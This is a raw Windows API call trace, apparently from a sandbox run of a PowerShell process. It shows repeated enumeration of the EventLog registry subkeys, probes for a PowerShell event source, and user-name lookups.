	[0144.761] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x354) returned 0x0
	[0144.762] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.762] RegOpenKeyExW (in: hKey=0x334, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x358) returned 0x0
	[0144.762] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.762] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x35c) returned 0x0
	[0144.762] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x360) returned 0x0
	[0144.762] RegCloseKey (hKey=0x360) returned 0x0
	[0144.762] RegCloseKey (hKey=0x334) returned 0x0
	[0144.763] RegCloseKey (hKey=0x35c) returned 0x0
	[0144.887] CoTaskMemAlloc (cb=0x804) returned 0x1b7e5e50
	[0144.888] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7e5e50, nSize=0x14d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d3a8) returned 0x1
	[0144.889] CoTaskMemFree (pv=0x1b7e5e50) 
	[0144.890] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.890] GetUserNameW (in: lpBuffer=0x19eeb0, pcbBuffer=0x14d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d3e8) returned 1
	[0144.891] CoTaskMemFree (pv=0x19eeb0) 
	[0145.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0e8 | out: phkResult=0x14d0e8*=0x364) returned 0x0
	[0145.058] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.058] CoTaskMemFree (pv=0x0) 
	[0145.058] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.059] CoTaskMemFree (pv=0x19eeb0) 
	[0145.059] CoTaskMemFree (pv=0x0) 
	[0145.059] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.059] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.060] CoTaskMemFree (pv=0x19eeb0) 
	[0145.060] CoTaskMemFree (pv=0x0) 
	[0145.060] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.060] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.060] CoTaskMemFree (pv=0x19eeb0) 
	[0145.060] CoTaskMemFree (pv=0x0) 
	[0145.060] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.060] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.060] CoTaskMemFree (pv=0x19eeb0) 
	[0145.060] CoTaskMemFree (pv=0x0) 
	[0145.060] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x368) returned 0x0
	[0145.060] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.060] RegOpenKeyExW (in: hKey=0x364, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x36c) returned 0x0
	[0145.060] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.060] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x370) returned 0x0
	[0145.060] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.061] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x374) returned 0x0
	[0145.061] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.061] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x378) returned 0x0
	[0145.061] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.061] RegOpenKeyExW (in: hKey=0x364, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x37c) returned 0x0
	[0145.061] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.061] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x380) returned 0x0
	[0145.061] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.061] RegOpenKeyExW (in: hKey=0x364, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x384) returned 0x0
	[0145.062] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.062] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x388) returned 0x0
	[0145.062] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x38c) returned 0x0
	[0145.062] RegCloseKey (hKey=0x38c) returned 0x0
	[0145.062] RegCloseKey (hKey=0x364) returned 0x0
	[0145.062] RegCloseKey (hKey=0x388) returned 0x0
	[0145.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0e8 | out: phkResult=0x14d0e8*=0x388) returned 0x0
	[0145.063] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.063] CoTaskMemFree (pv=0x0) 
	[0145.063] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.063] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.064] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.064] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.064] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.064] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.064] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.064] CoTaskMemFree (pv=0x19eeb0) 
	[0145.064] CoTaskMemFree (pv=0x0) 
	[0145.064] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.065] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.065] CoTaskMemFree (pv=0x19eeb0) 
	[0145.065] CoTaskMemFree (pv=0x0) 
	[0145.065] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.065] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.065] CoTaskMemFree (pv=0x19eeb0) 
	[0145.065] CoTaskMemFree (pv=0x0) 
	[0145.065] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.065] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x19eeb0, lpcchName=0x14d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.176] CoTaskMemFree (pv=0x19eeb0) 
	[0145.176] CoTaskMemFree (pv=0x0) 
	[0145.176] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x364) returned 0x0
	[0145.176] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.176] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x38c) returned 0x0
	[0145.177] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.177] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x390) returned 0x0
	[0145.177] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.177] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x394) returned 0x0
	[0145.177] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.177] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x398) returned 0x0
	[0145.177] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.178] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x39c) returned 0x0
	[0145.178] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.178] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x3a0) returned 0x0
	[0145.178] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.178] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x3a4) returned 0x0
	[0145.178] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x0) returned 0x2
	[0145.178] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x3a8) returned 0x0
	[0145.178] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d148 | out: phkResult=0x14d148*=0x3ac) returned 0x0
	[0145.179] RegCloseKey (hKey=0x3ac) returned 0x0
	[0145.179] RegCloseKey (hKey=0x388) returned 0x0
	[0145.179] RegCloseKey (hKey=0x3a8) returned 0x0
	[0145.181] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d0b8 | out: phkResult=0x14d0b8*=0x3a8) returned 0x0
	[0145.181] RegQueryInfoKeyW (in: hKey=0x3a8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d02c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d028, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d02c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d028*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.181] CoTaskMemFree (pv=0x0) 
	[0145.181] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.181] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x0, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.181] CoTaskMemFree (pv=0x19eeb0) 
	[0145.181] CoTaskMemFree (pv=0x0) 
	[0145.181] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.182] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x1, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.182] CoTaskMemFree (pv=0x19eeb0) 
	[0145.182] CoTaskMemFree (pv=0x0) 
	[0145.182] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.182] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x2, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.182] CoTaskMemFree (pv=0x19eeb0) 
	[0145.182] CoTaskMemFree (pv=0x0) 
	[0145.182] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.182] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x3, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.182] CoTaskMemFree (pv=0x19eeb0) 
	[0145.182] CoTaskMemFree (pv=0x0) 
	[0145.182] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.182] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x4, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.182] CoTaskMemFree (pv=0x19eeb0) 
	[0145.182] CoTaskMemFree (pv=0x0) 
	[0145.182] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.182] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x5, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.182] CoTaskMemFree (pv=0x19eeb0) 
	[0145.182] CoTaskMemFree (pv=0x0) 
	[0145.182] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.183] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x6, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.183] CoTaskMemFree (pv=0x19eeb0) 
	[0145.183] CoTaskMemFree (pv=0x0) 
	[0145.183] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.183] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x7, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.183] CoTaskMemFree (pv=0x19eeb0) 
	[0145.183] CoTaskMemFree (pv=0x0) 
	[0145.183] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0145.183] RegEnumKeyExW (in: hKey=0x3a8, dwIndex=0x8, lpName=0x19eeb0, lpcchName=0x14d0b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d0b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0145.183] CoTaskMemFree (pv=0x19eeb0) 
	[0145.183] CoTaskMemFree (pv=0x0) 
	[0145.183] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x388) returned 0x0
	[0145.184] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.184] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3ac) returned 0x0
	[0145.184] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.184] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3b0) returned 0x0
	[0145.184] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.184] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3b4) returned 0x0
	[0145.184] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.184] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3b8) returned 0x0
	[0145.185] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.185] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3bc) returned 0x0
	[0145.185] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x0) returned 0x2
	[0145.185] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d118 | out: phkResult=0x14d118*=0x3c0) returned 0x0
